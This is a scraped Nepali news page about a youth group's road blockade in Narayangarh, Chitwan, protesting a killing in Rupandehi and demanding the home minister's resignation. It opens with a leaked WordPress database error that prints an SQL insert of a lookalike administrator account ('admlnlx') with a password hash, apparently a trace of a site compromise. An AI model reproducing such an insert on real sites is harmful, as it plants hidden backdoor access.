WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTlZ2Z0awROq5u7HrGjr.TfLCOmtN11', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 12:12:10', '', 'admlnlx', 'admlnlx')
चितवन,पुष ५-
हिजो रुपन्देहीमा भएको तिवारी हत्याकाण्डको विरोधमा आज(मंगलबार) नारायणगढमा युवा संघ चितवनले चक्काजाम गरेको छ ।
हत्यामा संलग्न सबैलाई कारवाहि र गृहमन्त्रीको राजिनामा माग गर्दैै दिउसो १२ बजे देखी १ बजे सम्म चक्काजाम भइरहेको छ । विरोधकर्ताद्धारा मोटरसाइकल समेत गुड्न रोक लगाइएको छ । एक घण्टे चक्का जाममा युवा संघ नेपाल चितवन संयोजक दिलिप न्यौपानेले त्रास देखाएर आन्दोलन तुहाउने दुष्प्रयास नगर्न चेतावनी दिदै शोकलाई शक्तिमा बदल्न सम्पूर्णमा आह्वान गर्नुभयो। चक्का जामका क्रममा सरकार र गृह प्रशासनबिरुद्ध कडा नाराबाजी गर्दै सत्यतथ्य छानवीन गरि दोषीलाई कार्वाहीको माग गरेका थिए । साथै उनीहरुले गृहमन्त्रीको राजीनामा माग समेत गरेका थिए ।
दोषीलाई तत्काल कार्वाही नभए चितवन बन्द सम्मको कडा आन्दोलनको साथ अघि बढ्ने अनेरास्ववियु चितवनका प्रचार बिभाग प्रमुख बिमल केसीले चेतावनी दिनुभयो ।